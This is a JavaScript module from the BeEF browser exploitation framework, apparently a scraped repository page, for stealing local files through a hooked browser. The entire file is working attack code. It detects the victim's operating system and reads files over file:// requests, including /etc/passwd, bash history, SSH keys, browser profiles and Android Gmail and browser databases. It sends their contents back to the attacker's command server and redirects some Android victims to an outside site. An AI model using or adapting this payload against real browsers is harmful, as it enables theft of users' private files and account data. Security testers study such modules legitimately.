Path: blob/master/modules/misc/local_file_theft/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// local_file_theft7//8// Shamelessly plagurised from kos.io/xsspwn910beef.execute(function() {1112result = '';1314fileList = ['linux','mac','ios','android','windows']151617fileList['linux']= {18// How do we discover users?19"discover" :'/etc/passwd',2021// Okay, we found them, what do we pillage?22"post" :{23'bashHistory':'.bash_history',24'sshHosts':'.ssh/known_hosts',25'sshKeys':'.ssh/id_rsa.pub',26'firefoxProfiles':'.mozilla/firefox/profiles.ini',27'chromeBookmarks':'.config/chromium/Default/Bookmarks'28}29}3031fileList['mac']= {32// How do we discover users?33"discover" :'/Library/Preferences/com.apple.loginwindow.plist',3435// Okay, we found them, what do we pillage?36"post" :{37'bashHistory':'.bash_history',38'sshHosts':'.ssh/known_hosts',39'sshKeys':'.ssh/id_rsa.pub',40'firefoxProfiles':'.mozilla/firefox/profiles.ini',41'chromeBookmarks':'.config/chromium/Default/Bookmarks'42}43}4445fileList['android']= {46// Instead of how, just figure out the currently in use appi47"discover" :'/proc/self/status',4849// Okay, we found them, what do we pillage?50"post" :{51'browser_data':'/data/data/com.android.browser/databases/webview.db',52'browser_data2':'/data/data/com.android.browser/databases/browser.db',53'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',54'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',55'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',56'chromeBookmarks':'.config/chromium/Default/Bookmarks'57}58}5960fileList['ios']= {61// WHAT IS THIS I DON'T EVEN62"discover" :'',6364"post" :{65'iPadEtcHosts':'/etc/hosts'66}67}6869fileList['windows']= {70// Meh, who cares71"discover" :'',7273"post" :{74'bootini':'/c:/boot.ini',75'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'76}77}7879fileList['custom']= {80// user defined81"discover" :'',8283"post" :{84'result':'<%== @target_file %>',85}86}878889functionList = {90mac:{91// OS X disovery92discover : function(){93tmp = new XMLHttpRequest()94tmp.open('get',"file:///"+fileList['mac']['discover'])95tmp.send()96tmp.onreadystatechange=function(){97if(tmp.readyState==4){98// TODO99// Understand plist format to _reliably_ pull out username with regex100//user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];101user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];102homedir = "/Users/"+user+"/";103grabFiles(homedir,"mac")104}105}106return true;107}108},109110linux:{111// Linux username discovery112discover : function(){113tmp = new XMLHttpRequest()114tmp.open('get',"file:///"+fileList['linux']['discover'])115tmp.send()116tmp.onreadystatechange=function(){117if(tmp.readyState==4){118userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];119homedir = userDir+"/";120121grabFiles(homedir,"linux")122}123}124return true;125}126},127128129ios:{130// Grab ipad stuff131discover : function(){132tmp = new XMLHttpRequest()133tmp.open('get',fileList['ios']['discover'])134tmp.send()135tmp.onreadystatechange=function(){136if(tmp.readyState==4){137homedir = "file:///";138grabFiles(homedir,"ios")139}140}141return true;142}143},144145custom:{146// Grab custom stuff147discover : function(){148tmp = new XMLHttpRequest()149tmp.open('get',fileList['custom']['discover'])150tmp.send()151tmp.onreadystatechange=function(){152if(tmp.readyState==4){153homedir = "file:///";154grabFiles(homedir,"custom")155}156}157return true;158}159},160android:{161// figure out what app (gmail, browser, or dolphin?) android162discover : function(){163//document.location="http://kos.io/"164tmp = new XMLHttpRequest()165tmp.open('get',fileList['android']['discover'])166tmp.send()167tmp.onreadystatechange=function(){168if(tmp.readyState==4){169if(/.*android\.gm.*/.test(tmp.responseText)){170document.location="http://kos.io/gmail"171} else if(/.*android\.browser.*/.test(tmp.responseText)){172document.location="http://kos.io/browser"173} else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){174document.location="http://kos.io/dolphin"175}176177grabFiles("/","android")178}179}180return true;181}182}183184185}186187188function identify(){189190// custom file is specified191if ('<%== @target_file %>' != 'autodetect') {192return "custom"193194// determine a good file to steal based on platform195} else {196if(/.*Android.*/.test(navigator.userAgent)){197return "android"198} else if(/Linux.*/i.test(navigator.platform)){199return "linux"200} else if(/iP.*/i.test(navigator.platform)){201return "ios"202} else if(/.*Mac.*/i.test(navigator.userAgent)){203return "mac"204} else if(/.*Windows.*/i.test(navigator.userAgent)){205return "windows"206} else if(/.*hpwOS.*/i.test(navigator.platform)){207return "webos"208}209}210}211212213function discoverUsers(os){214return functionList[os]['discover']()215}216217218function grabFiles(dir,os){219tmpfile = {}220for (i in fileList[os]['post']){221beef.debug('dir = ' + dir);222beef.debug('fileList: ' + fileList[os]['post'][i]);223beef.debug(i);224tmpfile[i] = new XMLHttpRequest()225tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);226tmpfile[i].send();227228tmpfile[i].onreadystatechange=function(){229for (j in fileList[os]['post']){230if(tmpfile[j].readyState==4){231beef.debug('new returned for: ' + j);232result = j +": "+ tmpfile[j].responseText;233234beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);235}236}237}238239240}241242}243244245discoverUsers(identify());246247248249});250251252